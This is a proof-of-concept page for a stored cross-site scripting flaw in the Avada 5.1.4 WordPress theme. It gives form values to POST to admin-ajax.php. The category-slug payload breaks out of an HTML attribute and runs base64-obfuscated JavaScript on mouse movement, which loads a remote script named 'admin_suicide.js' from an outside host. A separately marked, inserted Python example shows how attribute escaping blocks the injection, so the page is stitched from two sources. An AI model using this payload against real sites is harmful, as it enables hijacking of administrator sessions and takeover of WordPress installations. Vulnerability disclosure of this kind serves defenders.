Avada 5.1.4 Stored XSS

by WpHutte.com

Notes:

You will need to move the mouse a bit in the red area when the XSS trigger page is loaded

Tested on WordPress 4.7.3

Settings:

Target URL:
* Note, /wp-admin/admin-ajax.php gets appended automatically if needed


The Form

Form Field Name | POC Data (input field value)
action | fake
permalink_structure | 1
avada_portfolio_category_slug | (value on the next line)
testing" style="position:fixed; top:0px; left:0px; width:9000px; height:9000px; background-color:red;" onmousemove="eval(atob('dmFyIGpzPWRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoJ3NjcmlwdCcpO2pzLnR5cGUgPSAnd GV4dC9qYXZhc2NyaXB0Jztqcy5zcmM9J2h0dHBzOi8vY2RuLndwaHV0dGUuY29tL0F2YWRhLzUuMS40L2FkbWluX3N1aWNpZGUuanMnO2RvY3VtZW50Lm JvZHkuYXBwZW5kQ2hpbGQoanMpOwo'))" data-x="
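
The slug value above closes a double-quoted attribute, adds style and onmousemove attributes, and reopens a quote with data-x. The following is an added example, not code from the original page or from the theme: it assumes the value is echoed into a double-quoted HTML attribute (the page does not show the theme's markup), and TEMPLATE, SAMPLE_SLUG and the function names are hypothetical. It parses the rendered markup to show which attributes appear with and without attribute escaping.

```python
from html import escape
from html.parser import HTMLParser

# Constructed stand-in with the same shape as the slug value in the form:
# it closes the quoted attribute, adds attributes, then reopens a quote.
SAMPLE_SLUG = 'testing" style="position:fixed" onmousemove="alert(1)" data-x="'

# Hypothetical template (assumption); the theme's real markup is not on the page.
TEMPLATE = '<input type="text" name="avada_portfolio_category_slug" value="{}">'


class AttrCollector(HTMLParser):
    """Records the attributes of every start tag the parser sees."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def parsed_attrs(markup):
    """Return the attribute dict of the first tag in markup."""
    collector = AttrCollector()
    collector.feed(markup)
    collector.close()
    return collector.tags[0][1]


def render_unescaped(value):
    # Value placed into the attribute as-is: a " in it ends the attribute.
    return TEMPLATE.format(value)


def render_escaped(value):
    # escape(quote=True) turns " into &quot;, so the value stays inside value="...".
    return TEMPLATE.format(escape(value, quote=True))


def injected_attrs(markup):
    """Attributes present in markup that the template itself never emits."""
    expected = {"type", "name", "value"}
    return sorted(set(parsed_attrs(markup)) - expected)


if __name__ == "__main__":
    print("unescaped:", injected_attrs(render_unescaped(SAMPLE_SLUG)))
    print("escaped:  ", injected_attrs(render_escaped(SAMPLE_SLUG)))
```

In WordPress code the equivalent of render_escaped is passing the value through esc_attr() at output time.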

Iframe for POST result


POC by WPHutte.com